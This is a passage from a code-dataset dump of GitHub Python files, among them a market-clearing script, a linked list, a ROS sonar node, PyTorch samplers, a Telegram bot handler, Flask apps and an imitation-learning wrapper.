book)\r\norderbook_offer = pd.DataFrame(columns = ['ID','Bus','P_or_Q','Direction','Quantity','Price','Time_target','Time_stamp'])\r\norderbook_offer.set_index('ID',inplace=True)\r\norderbook_request = pd.DataFrame(columns = ['ID','Bus','Type','P_or_Q','Direction','Quantity','Price','Time_target','Time_stamp'])\r\norderbook_request.set_index('ID',inplace=True)\r\n# Create an empty dataframe to contain the accepted conditional requests\r\naccepted_requests = pd.DataFrame(columns = ['Bus','Direction','P_or_Q','Dispatch Change','Time_target'])\r\n\r\n#%% Function to match a new offer\r\nmatches = pd.DataFrame(columns = ['Offer','Offer Bus','Request','Request Bus','P_or_Q','Direction','Quantity','Matching Price','Time_target'])\r\n\r\nSocialWelfare = 0\r\nProcurementCost = 0\r\nfor b in all_bids.index:\r\n new_bid = all_bids.loc[b]\r\n matche, orderbook_request, orderbook_offer, accepted_requests, Setpoint, flag,SocialWelfare,ProcurementCost = Market_clearing(new_bid, orderbook_request, orderbook_offer, accepted_requests, Setpoint,SocialWelfare,ProcurementCost)\r\n matches=matches.append(matche)\r\n print(b+'--'+flag)\r\n \r\n \r\n\r\norderbook_offer.columns = ['location','type', 'regulation','volume','price','timetarget','timestamp']\r\norderbook_offer.index.names = ['offerId']\r\norderbook_request.columns = ['location','requestType','type', 'regulation','volume','price','timetarget','timestamp']\r\norderbook_request.index.names = ['flexRequestId']\r\n\r\naccepted_requests.columns = ['location', 'regulation','type','volume','timetarget']\r\naccepted_requests.index.names = ['flexRequestId']\r\n\r\nmatches.columns =['offerId','offerlocation','flexRequestId','requestlocation','type','regulation','volume','matchingprice','timetarget']\r\n","repo_name":"FLEXGRID-DTU/P_and_Q_Reserve_Market_Clearing","sub_path":"Continuous_P_and_Q_Market_Clearing.py","file_name":"Continuous_P_and_Q_Market_Clearing.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"35226677499","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n def __repr__(self): #__repr__ exists so you don't have to type cast the class into String data type\r\n return self.data\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self, nodes=None):\r\n self.head = None\r\n if nodes is not None:\r\n node = Node(data=nodes.pop(0))\r\n self.head = node\r\n for elem in nodes:\r\n node.next = Node(data=elem)\r\n node = node.next\r\n\r\n def __repr__(self): #enables LinkedList to have a DEFAULT string representation\r\n node = self.head\r\n nodes = []\r\n while node is not None:\r\n nodes.append(node.data)\r\n node = node.next\r\n nodes.append(\"None\")\r\n return \" -> \".join(nodes)\r\n\r\n def __iter__(self): #enables LinkedList to become an iterable object\r\n node = self.head\r\n while node is not None:\r\n yield node\r\n node = node.next\r\n\r\n def add_first(self, node):\r\n node.next = self.head\r\n self.head = node\r\n\r\n def add_last(self, node):\r\n if not self.head:\r\n self.head = node\r\n return\r\n for current_node in self: #After the entire list is iterated, the pointer does not return back to 0.\r\n pass # Linked lists cannot be indexed.\r\n current_node.next = node #current_node pointer is at the last item\r\n\r\n def add_after(self, target_node_data, new_node):\r\n if not self.head:\r\n raise Exception(\"List is empty!\")\r\n\r\n for node in self:\r\n if node.data == target_node_data:\r\n new_node.next = node.next\r\n node.next = new_node\r\n return\r\n\r\n raise Exception(\"Node with data '%s' not found\" % target_node_data)\r\n \r\n def add_before(self, target_node_data, new_node):\r\n if not self.head:\r\n raise Exception(\"List is empty!\")\r\n\r\n if target_node_data == self.head.data:\r\n self.add_first(new_node)\r\n\r\n prev_node = self.head\r\n for node in self:\r\n if target_node_data == node.data:\r\n prev_node.next = new_node\r\n new_node.next = node\r\n return\r\n prev_node = node\r\n\r\n raise Exception(\"Node with data %s is not found!\" % target_node_data)\r\n\r\n def remove_node(self, target_node_data):\r\n if not self.head:\r\n raise Exception(\"List is empty!\")\r\n\r\n if target_node_data == self.head.data:\r\n self.head = self.head.next\r\n return\r\n\r\n prev_node = self.head\r\n for node in self:\r\n if target_node_data == node.data:\r\n prev_node.next = node.next\r\n return\r\n prev_node = node\r\n\r\n raise Exception(\"Node with data %s is not found!\" % target_node_data)\r\n \r\n\r\n'''linked_list = LinkedList()\r\nprint(linked_list)\r\n\r\nfirst_node = Node(\"c\")\r\nsecond_node = Node(\"b\")\r\nthird_node = Node(\"a\")\r\nlinked_list.head = first_node\r\nfirst_node.next = second_node\r\nsecond_node.next = third_node\r\nlinked_list.add_first(Node(\"d\"))\r\nprint(linked_list)\r\n\r\n\r\nlinked_list2 = LinkedList([\"a\",\"b\",\"c\",\"d\",\"e\",\"f\"])\r\nprint(linked_list2)'''\r\n\r\nlinked_list = LinkedList()\r\nlinked_list.add_last(Node(\"b\"))\r\nlinked_list.add_last(Node(\"c\"))\r\nlinked_list.add_last(Node(\"d\"))\r\nlinked_list.add_first(Node(\"a\"))\r\nlinked_list.add_last(Node(\"e\"))\r\nlinked_list.add_after(\"c\", Node(\"cx\"))\r\nlinked_list.add_before(\"c\", Node(\"bx\"))\r\n\r\nprint(linked_list)\r\n","repo_name":"kristiansantos11/datastructure-and-algorithms","sub_path":"algorithms part 1/linked_lists/optimized_linked_list.py","file_name":"optimized_linked_list.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73843503730","text":"#!/usr/bin/env python\nfrom rospy import Publisher, init_node, Rate, is_shutdown, get_rostime, ROSInterruptException\nfrom std_msgs.msg import Float64\nimport RPi.GPIO as GPIO\nimport time\nfrom blimp_control.msg import Float64WithHeader\nGPIO.setmode(GPIO.BCM)\n\nTRIG = 23\nECHO = 24\n\nGPIO.setup(TRIG,GPIO.OUT)\nGPIO.setup(ECHO,GPIO.IN)\n\nGPIO.output(TRIG, False)\ntime.sleep(2)\n\ndef sonar():\n pub = Publisher('sonar_meas', Float64WithHeader, queue_size=10)\n pub1 = Publisher('sonar_meas_control', Float64, queue_size=10)\n init_node('sonar', anonymous=True)\n rate = Rate(20) # 10hz\n while not is_shutdown():\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n count = 0\n while GPIO.input(ECHO)==0:\n if count>1000:\n break\n pulse_start = time.time()\n count += 1\n\n count = 0\n while GPIO.input(ECHO)==1:\n if count>1000:\n break\n pulse_end = time.time()\n count += 1\n\n pulse_duration = pulse_end - pulse_start\n\n distance = pulse_duration*17150\n distance = distance/100.0\n\n sonar_data = Float64WithHeader()\n sonar_data.header.stamp = get_rostime()\n if abs(distance) < 2.0:\n sonar_data.float.data = distance\n pub1.publish(distance)\n else:\n sonar_data.float.data = 0.0\n pub1.publish(0.0)\n pub.publish(sonar_data)\n rate.sleep()\n\n\nif __name__ == '__main__':\n try:\n sonar()\n except ROSInterruptException:\n pass\n","repo_name":"DanielDworakowski/flot","sub_path":"rasp/blimp_ws/src/blimp_control/src/hc_sr04_node.py","file_name":"hc_sr04_node.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"10104293974","text":"# Standard Library\nimport math\nfrom collections import defaultdict\n\n# Import from third library\nimport numpy as np\nimport torch\nfrom torch.utils.data.sampler import Sampler\n\nfrom up.utils.env.dist_helper import env, get_rank, get_world_size\nfrom up.utils.general.log_helper import default_logger as logger\nfrom up.utils.general.registry_factory import SAMPLER_REGISTRY\n\n__all__ = ['DistributedSampler', 'LocalSampler', 'TestDistributedSampler']\n\n\n@SAMPLER_REGISTRY.register('dist')\nclass DistributedSampler(Sampler):\n \"\"\"\n Sampler that restricts data loading to a subset of the dataset.\n\n .. note:\n Dataset is assumed to be of constant size.\n\n Arguments:\n dataset (Dataset): dataset used for sampling.\n num_replicas (int): number of processes participating in distributed training, optional.\n rank (int): rank of the current process within num_replicas, optional.\n \"\"\"\n\n def __init__(self, dataset, num_replicas=None, rank=None, fix_seed=False):\n \"\"\"\n Arguments:\n - dataset (:obj:`dataset`): instance of dataset object\n \"\"\"\n if num_replicas is None:\n num_replicas = env.world_size\n if rank is None:\n rank = env.rank\n\n self.dataset = dataset\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.num_samples = int(math.ceil(len(self.dataset) * 1.0 / self.num_replicas))\n self.total_size = self.num_samples * self.num_replicas\n self.fix_seed = fix_seed\n\n def __iter__(self):\n # deterministically shuffle based on epoch\n g = torch.Generator()\n g.manual_seed(self.epoch * (not self.fix_seed))\n indices = list(torch.randperm(len(self.dataset), generator=g))\n\n # add extra samples to make it evenly divisible\n # indices += indices[:(self.total_size - len(indices))]\n padding_size = self.total_size - len(indices)\n if padding_size <= len(indices):\n indices += indices[:padding_size]\n else:\n indices += (indices * math.ceil(padding_size / len(indices)))[:padding_size]\n assert len(indices) == self.total_size\n\n # subsample\n offset = self.num_samples * self.rank\n indices = indices[offset:offset + self.num_samples]\n assert len(indices) == self.num_samples\n\n return iter(indices)\n\n def __len__(self):\n return self.num_samples\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n\n\n@SAMPLER_REGISTRY.register('local')\nclass LocalSampler(Sampler):\n def __init__(self, dataset, rank=None):\n if rank is None:\n rank = env.rank\n self.dataset = dataset\n self.rank = rank\n self.epoch = 0\n self.num_samples = len(self.dataset)\n\n def __iter__(self):\n # deterministically shuffle based on epoch\n g = torch.Generator()\n g.manual_seed(self.epoch + self.rank)\n indices = list(torch.randperm(self.num_samples, generator=g))\n return iter(indices)\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n\n def __len__(self):\n return self.num_samples\n\n\n@SAMPLER_REGISTRY.register('dist_test')\nclass TestDistributedSampler(Sampler):\n \"\"\"\n Sampler that restricts data loading to a subset of the dataset, but won't align the total data\n size to be divisible by world_size bacause this will lead to duplicate detecton results\n \"\"\"\n\n def __init__(self, dataset, num_replicas=None, rank=None):\n \"\"\"\n Arguments:\n - dataset (:obj:`dataset`): instance of dataset object\n \"\"\"\n if num_replicas is None:\n num_replicas = env.world_size\n if rank is None:\n rank = env.rank\n\n self.dataset = dataset\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.num_samples = len(range(rank, len(self.dataset), num_replicas))\n self.total_size = len(self.dataset)\n\n def __iter__(self):\n indices = torch.arange(len(self.dataset))\n indices = indices[self.rank::self.num_replicas]\n assert len(indices) == self.num_samples\n return iter(indices)\n\n def __len__(self):\n return self.num_samples\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n\n\n@SAMPLER_REGISTRY.register('repeat_factor')\nclass DistributedRepeatFactorReSampler(Sampler):\n \"\"\" Suitable for long-tail distribution datasets.\n Refer to `LVIS `_ paper\n \"\"\"\n def __init__(self, dataset, t=0.001, ri_mode='random_round', pn=0.5,\n ri_if_empty=1, num_replicas=None, static_size=True, rank=None):\n \"\"\"\n Arguments:\n - dataset (:obj:`Dataset`): dataset used for sampling.\n - t (:obj:`float`): thresh- old that intuitively controls the point at which oversampling kicks in\n - ri_mode (:obj:`str`): choices={floor, round, random_round, ceil, c_ceil_r_f_floor}, method to compute\n repeat factor for one image\n - pn (:obj:`float`): power number\n - num_replicas (int): number of processes participating in distributed training, optional.\n - rank (int): rank of the current process within num_replicas, optional.\n \"\"\"\n if num_replicas is None:\n num_replicas = get_world_size()\n if rank is None:\n rank = get_rank()\n\n self.dataset = dataset\n self.num_replicas = num_replicas\n self.rank = rank\n self.epoch = 0\n self.num_samples = int(math.ceil(len(self.dataset) * 1.0 / self.num_replicas))\n self.total_size = self.num_samples * self.num_replicas\n self.original_num_samples = self.num_samples\n self.t = t\n self.ri_mode = ri_mode\n self.ri_if_empty = int(ri_if_empty)\n self.pn = pn\n self.static_size = static_size\n self._prepare()\n logger.info('init re-sampler, ri mode: {}'.format(self.ri_mode))\n\n def _prepare(self):\n # prepare re-sampling factor for category\n rc = defaultdict(int)\n img_num_per_class = defaultdict(int)\n for cls, img_num in sorted(self.dataset.num_images_per_class.items()):\n f = img_num / len(self.dataset)\n img_num_per_class[cls] = img_num\n rc[cls] = max(1, math.pow(self.t / f, self.pn))\n logger.info('class id {}, image count {}, rc {}'.format(cls, img_num, rc[cls]))\n self.rc = rc\n\n def _compute_ri(self, img_index):\n classes = self.dataset.get_image_classes(img_index)\n ris = [self.rc[cls] for cls in classes]\n if len(ris) == 0:\n return self.ri_if_empty\n if self.ri_mode == 'floor':\n ri = int(max(ris))\n elif self.ri_mode == 'round':\n ri = round(max(ris))\n elif self.ri_mode == 'random_round':\n ri_max = max(ris)\n p = ri_max - int(ri_max)\n if np.random.rand() < p:\n ri = math.ceil(ri_max)\n else:\n ri = int(ri_max)\n elif self.ri_mode == 'ceil':\n ri = math.ceil(max(ris))\n elif self.ri_mode == 'c_ceil_r_f_floor':\n max_ind = np.argmax(ris)\n assert hasattr(self.dataset, 'lvis'), 'Only lvis dataset supportted for c_ceil_r_f_floor mode'\n img_id = self.dataset.img_ids[img_index]\n meta_annos = self.dataset.lvis.img_ann_map[img_id]\n f = self.dataset.lvis.cats[meta_annos[max_ind]['category_id']]['frequency']\n assert f in ['f', 'c', 'r']\n if f in ['r', 'f']:\n ri = int(max(ris))\n else:\n ri = math.ceil(max(ris))\n else:\n raise NotImplementedError\n return ri\n\n def _get_new_indices(self):\n indices = []\n for idx in range(len(self.dataset)):\n ri = self._compute_ri(idx)\n indices += [idx] * ri\n\n logger.info('dataset size {}, indexes size {}'.format(len(self.dataset), len(indices)))\n return indices\n\n def __iter__(self):\n # deterministically shuffle based on epoch\n\n # generate a perm based using class-aware balance for this epoch\n indices = self._get_new_indices()\n\n # override num_sample total size\n self.num_samples = int(math.ceil(len(indices) * 1.0 / self.num_replicas))\n self.total_size = self.num_samples * self.num_replicas\n\n indices = np.random.RandomState(seed=self.epoch).permutation(np.array(indices))\n indices = list(indices)\n\n # add extra samples to make it evenly divisible\n indices += indices[:(self.total_size - len(indices))]\n assert len(indices) == self.total_size\n\n # subsample\n offset = self.num_samples * self.rank\n indices = indices[offset:offset + self.num_samples]\n assert len(indices) == self.num_samples\n\n # convert to int because this array will be converted to torch.tensor,\n # but torch.as_tensor dosen't support numpy.int64\n # a = torch.tensor(np.float64(1)) # works\n # b = torch.tensor(np.int64(1)) # fails\n indices = list(map(lambda x: int(x), indices))\n return iter(indices)\n\n def __len__(self):\n return self.original_num_samples\n\n def set_epoch(self, epoch):\n self.epoch = epoch\n","repo_name":"Sense-X/UniHead","sub_path":"up/data/samplers/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"20"} +{"seq_id":"40025379346","text":"'''Global variables :) '''\nstr = \"This is a simple text used to verified the correct functionality of str_replacing function. Adding a Z and a z\"\nabc = {'a':0, 'b':0, 'c':0, 'd':0, 'e':0, 'f':0, 'g':0, 'h':0, 'i':0,'j':0,'k':0,'l':0,'m':0,'n':0,'o':0,'p':0,'q':0,'r':0,'s':0,'t':0,'u':0,'v':0,'w':0,'y':0,'z':0}\n\nprint('\\n======= Search an url into a given text ======\\n')\nsearch = \"i\"\nrpl = \"0\"\ndef str_searching():\n global str\n targ=\"http\"\n ini = 0\n fin = 0\n if str.find(targ)>0 :\n ini = str.find(targ)\n new_str = str[ini:len(str)]\n fin = new_str.find(' ')\n print('There is a url in text ', new_str[0:fin])\n else:\n print (\"There is not a url in text\")\nstr_searching()\n\nprint('\\n======= Replacing a letter from a string ======\\n')\ndef str_replacing():\n global search\n global rpl\n global str\n print('OLD text: \\n', str)\n new_str=\" \"\n glue=\" \"\n i=0\n for i in range (len(str)):\n if str[i].lower() == search:\n new_str= new_str + glue.join(rpl)\n else:\n new_str= new_str + glue.join(str[i])\n i += 1\n print('NEW text: \\n', new_str)\nstr_replacing()\n\nprint('\\n======= Count how many times a letter is repeated on a text ======\\n')\ndef str_countAlpha():\n global str\n global abc\n i=0\n for i in range (len(str)):\n if str[i].lower() != \" \":\n if str[i].lower() in abc:\n abc[str[i].lower()] +=1\n print (abc)\n\nstr_countAlpha()\n","repo_name":"mauricioZelaya/QETraining_BDT_python","sub_path":"RosarioFalconi/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"20"} +{"seq_id":"32210668327","text":"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\n\"\"\"\n\n6.1. Layers and Modules\n\"\"\"\nnet = nn.Sequential(nn.LazyLinear(256), nn.ReLU(), nn.LazyLinear(10))\n\nX = torch.rand(2, 20)\nprint(net(X).shape)\n\n\n\"\"\"\n\n6.1.1. A Custom Module\n\"\"\"\nclass MLP(nn.Module):\n def __init__(self):\n # Call the constructor of the parent class nn.Module to perform\n # the necessary initialization\n super().__init__()\n self.hidden = nn.LazyLinear(256)\n self.out = nn.LazyLinear(10)\n\n # Define the forward propagation of the model, that is, how to return the\n # required model output based on the input X\n def forward(self, X):\n return self.out(F.relu(self.hidden(X)))\n \n\nnet = MLP()\nprint(net(X).shape)\n\n\n\"\"\"\n\n6.1.2. The Sequential Module\n\"\"\"\nclass MySequential(nn.Module):\n def __init__(self, *args):\n super().__init__()\n for idx, module in enumerate(args):\n self.add_module(str(idx), module) # layer_name be not the same, like parameters str.\n\n def forward(self, X):\n for module in self.children():\n X = module(X)\n return X\n\nnet = MySequential(nn.LazyLinear(256), nn.ReLU(), nn.LazyLinear(10))\nnet(X).shape\n\n\n\"\"\"\n \n6.1.3. Executing Code in the Forward Propagation Method\n\"\"\"\nclass FixedHiddenMLP(nn.Module):\n def __init__(self):\n super().__init__()\n # Random weight parameters that will not compute gradients and\n # therefore keep constant during training\n self.rand_weight = torch.rand((20, 20))\n self.linear = nn.LazyLinear(20)\n\n def forward(self, X):\n X = self.linear(X)\n X = F.relu(X @ self.rand_weight + 1)\n # Reuse the fully connected layer. This is equivalent to sharing\n # parameters with two fully connected layers\n X = self.linear(X)\n # Control flow\n while X.abs().sum() > 1:\n X /= 2\n return X.sum()\n\nnet = FixedHiddenMLP()\nnet(X)\n\n\n\"\"\"\n\n组合嵌套块\n\"\"\"\nclass NestMLP(nn.Module):\n def __init__(self):\n super().__init__()\n self.net = nn.Sequential(nn.LazyLinear(64), nn.ReLU(),\n nn.LazyLinear(32), nn.ReLU())\n self.linear = nn.LazyLinear(16)\n\n def forward(self, X):\n return self.linear(self.net(X))\n\nchimera = nn.Sequential(NestMLP(), nn.LazyLinear(20), FixedHiddenMLP())\nchimera(X)","repo_name":"yingmuzhi/deep_learning","sub_path":"chapter6/6.1. Layers and Modules.py","file_name":"6.1. Layers and Modules.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"36231430155","text":"from aiogram import Dispatcher, types\n\nfrom src.crud import crud_user\nfrom src.db import SessionLocal\nfrom src.models import User\nfrom src.telegram_bot.init import bot\nfrom src.telegram_bot.keyboard_markups import kbm_main_menu\n\nLIST_LEARNING_COLLECTION_ERROR_1 = \"Ошибка! У вас нет добавленных тренировок!\"\n\n\nasync def list_learning_collections(query: types.CallbackQuery):\n \"\"\"\n Adding user into the database after\n user executes /start command.\n \"\"\"\n db = SessionLocal()\n\n user_telegram_id = query.from_user.id\n user = crud_user.get_by_telegram_id(db, user_telegram_id)\n user_learning_collection_names = [\n user_learning_collection.learning_collection.name for user_learning_collection in user.learning_collections\n ]\n\n response_message = \"\\n\".join(user_learning_collection_names)\n\n if not response_message:\n response_message = LIST_LEARNING_COLLECTION_ERROR_1\n\n await bot.send_message(user.telegram_id, response_message, reply_markup=kbm_main_menu)\n\n\ndef register_list_learning_collections_command(bot_dispatcher: Dispatcher):\n bot_dispatcher.register_callback_query_handler(list_learning_collections, text=\"list_learning_collections\")\n","repo_name":"jakefish18/UesugiToolBot","sub_path":"src/telegram_bot/client_commands/list_learning_collections.py","file_name":"list_learning_collections.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"1325799252","text":"from typing import Any, Generic, Iterable, Mapping, Optional, TypeVar, Union\n\nimport torch as th\nimport numpy as np\nimport torch.utils.data as th_data\n\nfrom imitation.algorithms import bc\nfrom imitation.algorithms.bc import BehaviorCloningLossCalculator, BehaviorCloningTrainer\nfrom imitation.data import rollout, types\nfrom stable_baselines3.common import policies\n\n\ndef my_super_awesome_collate_fn(batch):\n \"I stole this from https://github.com/HumanCompatibleAI/imitation/pull/415/files\"\n\n spec_keys = [\"infos\", \"obs\", \"next_obs\"] if isinstance(batch[0]['obs'], dict) else [\"infos\"]\n batch_no_infos = [\n {k: np.array(v) for k, v in sample.items() if k not in spec_keys} for sample in batch\n ]\n result = th_data.dataloader.default_collate(batch_no_infos)\n assert isinstance(result, dict)\n\n # zip result[\"obs\"] into TensorDict\n if \"obs\" in spec_keys:\n result[\"obs\"] = {obs_key: np.array([sample[\"obs\"][obs_key] for sample in batch]) \\\n for obs_key in batch[0][\"obs\"]}\n result[\"next_obs\"] = {obs_key:np.array([sample[\"next_obs\"][obs_key] for sample in batch]) \\\n for obs_key in batch[0][\"obs\"]}\n result[\"infos\"] = [sample[\"infos\"] for sample in batch]\n return result\n\n\ndef make_data_loader(transitions, batch_size, data_loader_kwargs=None):\n \"modified from https://github.com/HumanCompatibleAI/imitation/blob/ed45793dfdd897d3ac1f3a863a8816b56d436887/src/imitation/algorithms/base.py\"\n if batch_size <= 0:\n raise ValueError(f\"batch_size={batch_size} must be positive.\")\n\n if isinstance(transitions, Iterable):\n try:\n first_item = next(iter(transitions))\n except StopIteration:\n first_item = None\n if isinstance(first_item, types.Trajectory):\n transitions = rollout.flatten_trajectories(list(transitions))\n\n if isinstance(transitions, types.TransitionsMinimal):\n if len(transitions) < batch_size:\n raise ValueError(\n f\"Number of transitions in `demonstrations` {len(transitions)} \"\n f\"is smaller than batch size {batch_size}.\",\n )\n\n extra_kwargs = dict(shuffle=True, drop_last=True)\n if data_loader_kwargs is not None:\n extra_kwargs.update(data_loader_kwargs)\n return th_data.DataLoader(\n transitions,\n batch_size=batch_size,\n collate_fn=my_super_awesome_collate_fn,\n **extra_kwargs,\n )\n elif isinstance(transitions, Iterable):\n return _WrappedDataLoader(transitions, batch_size)\n else:\n raise TypeError(f\"`demonstrations` unexpected type {type(transitions)}\")\n\n\nclass BehaviorCloningTrainerDictObs(BehaviorCloningTrainer):\n \"\"\"Functor to fit a policy to expert demonstration data.\"\"\"\n\n loss: BehaviorCloningLossCalculator\n optimizer: th.optim.Optimizer\n policy: policies.ActorCriticPolicy\n\n def __call__(self, batch):\n obs = self.preprocess_obs(batch['obs'])\n acts = th.as_tensor(batch[\"acts\"], device=self.policy.device).detach()\n training_metrics = self.loss(self.policy, obs, acts)\n\n self.optimizer.zero_grad()\n training_metrics.loss.backward()\n self.optimizer.step()\n\n return training_metrics\n \n def preprocess_img(self, obs):\n assert isinstance(obs, np.ndarray)\n\n obs = obs / 255\n obs = np.transpose(obs, (0, 3, 1, 2))\n obs = th.as_tensor(obs, dtype=th.float32, device=self.policy.device).detach()\n return obs\n\n def preprocess_obs(self, obs):\n processed_obs = {}\n for key, val in obs.items():\n if len(val.shape) == 4:\n processed_obs[key] = self.preprocess_img(val)\n else:\n processed_obs[key] = th.as_tensor(\n obs[key], dtype=th.float32, device=self.policy.device\n ).detach()\n\n return processed_obs\n\n\nclass BC_(bc.BC):\n '''\n The BC implementation in imiation does not support dict observations, so we have to override their functions that create their dataloaders\n '''\n def __init__(\n self,\n *,\n observation_space,\n action_space,\n policy,\n demonstrations,\n batch_size=32,\n optimizer_cls=th.optim.Adam,\n optimizer_kwargs={},\n ent_weight=1e-3,\n l2_weight=0.0,\n device=\"auto\",\n custom_logger=None,\n ):\n super(BC_, self).__init__(\n observation_space=observation_space,\n action_space=action_space,\n policy=policy,\n demonstrations=demonstrations,\n batch_size=batch_size,\n optimizer_cls=optimizer_cls,\n optimizer_kwargs=optimizer_kwargs,\n ent_weight=ent_weight,\n l2_weight=l2_weight,\n device=device,\n custom_logger=custom_logger,\n )\n\n optimizer_kwargs = optimizer_kwargs or {}\n optimizer = optimizer_cls(\n self.policy.parameters(),\n **optimizer_kwargs,\n )\n loss_computer = BehaviorCloningLossCalculator(ent_weight, l2_weight)\n self.trainer = BehaviorCloningTrainerDictObs(\n loss_computer,\n optimizer,\n policy,\n )\n\n def set_demonstrations(self, demonstrations):\n self._demo_data_loader = make_data_loader(\n demonstrations,\n self.batch_size,\n )","repo_name":"mpiseno/nat-rl","sub_path":"nat_rl/algos/bc.py","file_name":"bc.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"33897621123","text":"from exception import logging\n\n\ndef input_data() -> list[str]:\n try:\n lst = ['' for i in range(4)]\n lst[0] = input_surname()\n lst[1] = input_name()\n lst[2] = input_telephone()\n lst[3] = input_comment()\n print_separator()\n return lst\n except Exception as e:\n logging.debug(e)\n\n\ndef input_surname():\n try:\n return input(\"Введите Фамилию: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_name():\n try:\n return input(\"Введите Имя: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_telephone():\n try:\n return input(\"Введите телефон: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_comment():\n try:\n return input(\"Введите комментарий: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_info():\n try:\n return input(\"Искать: \")\n except Exception as e:\n logging.debug(e)\n\n\ndef input_number() -> str:\n try:\n num = input('Введите номер: ')\n num = num.replace('-', '')\n num = num.replace(' ', '')\n return num\n except Exception as e:\n logging.debug(e)\n\n\ndef input_choose(message: str = f'Ваш выбор (Что бы повторить меню - 5) > ') -> int:\n try:\n return int(input(message))\n except Exception as e:\n logging.debug(e)\n\n\ndef print_choose_action_menu():\n print(\"Выберите - что хотите сделать: \"\n \"\\n1 - Поиск контакта \"\n \"\\n2 - Распечатать телефонную книгу \"\n \"\\n3 - Добавить запись в телефонную книгу \"\n \"\\n4 - Удаление запись из телефонной книги \"\n \"\\n5 - Главное меню \"\n \"\\n6 - Выход\\n \")\n\n\ndef print_data(input_array: list):\n print(f\"Фамилия: {input_array[0]}\")\n print(f\"Имя: {input_array[1]}\")\n print(f\"Номер телефона: {input_array[2]}\")\n print(f\"Комментарий: {input_array[3]}\")\n print_separator()\n\n\ndef print_not_found():\n print('Контакт не найден, попробуйте ещё раз')\n print_separator()\n\n\ndef print_separator():\n print('---------------------')\n","repo_name":"ShadowGreg/TelephoneDirectory","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"70668481971","text":"from flask import Flask\r\nfrom flask_restful import Api, Resource\r\n\r\nimport application\r\napp = Flask(__name__)\r\napi = Api(app)\r\n \r\nclass GitHub(Resource):\r\n def get(self):\r\n\r\n res = application.trending_repos()\r\n return res\r\n\r\napi.add_resource(GitHub, \"/trending_language\")\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.run(debug=True)","repo_name":"massaoudiikram/backend_challenge","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"22164158541","text":"from flask import Flask, render_template, request, jsonify\nimport json\nfrom API.routes import api_bp, recipes\n\napp = Flask(__name__)\napp.register_blueprint(api_bp, url_prefix='/api') # Registra el Blueprint del API\n\n@app.route('/', methods=['GET'])\ndef show_feed():\n return render_template('feed.html', recipes=recipes)\n\n@app.route('/buscar', methods=['GET'])\ndef search_recipe():\n query = request.args.get('query', '') # Consulta del formulario de búsqueda\n results = []\n for recipe in recipes:\n if query.lower() in recipe['name'].lower() or \\\n query.lower() in recipe['creator'].lower() or \\\n any(query.lower() in ingredient.lower() for ingredient in recipe['ingredients']):\n results.append(recipe)\n\n return render_template('results.html', results=results, query=query)\n\n@app.route('/results', methods=['GET'])\ndef show_results():\n search_query = request.args.get('query', '').lower()\n matching_recipes = [recipe for recipe in recipes if\n search_query in recipe['name'].lower() or\n search_query in recipe['creator'].lower() or\n any(search_query in ingredient.lower() for ingredient in recipe['ingredients'])]\n \n return render_template('results.html', query=search_query, resultados=matching_recipes)\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"MichelleDardon10/RecipesApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72689769970","text":"import os\nimport cv2\n\nsets_list = [\"train\", \"test\"]\n\ndataDir = \"/home/swei/workdir/landmark/landmark\"\n\nfor set_list in sets_list:\n\n org_txt = os.path.join(dataDir, \"%s_list.txt\"%(set_list))\n dst_txt = os.path.join(os.getcwd(), \"%s_list.txt\"%(set_list))\n\n filenames_queue = open(org_txt, \"r\").readlines()\n dst_list = open(dst_txt, \"w\")\n for filename_queue in filenames_queue:\n filename = filename_queue.split('\\n')[0]\n imagefilename = os.path.join(dataDir, \"all_image/%s.jpg\"%filename)\n imageshape = cv2.imread(imagefilename).shape\n print(imageshape)\n\n rect_queue = open(os.path.join(dataDir, \"all_rect/%s.rct\"%filename), \"r\").readline().split(' ')\n dst_list.write('%s %s %s %s %s'%(imagefilename, rect_queue[0], rect_queue[1], rect_queue[2], rect_queue[3]))\n\n pointfilename = os.path.join(dataDir, \"all_point/%s.pts\"%filename)\n points_queue = open(pointfilename, \"r\").readlines()\n for point_queue in 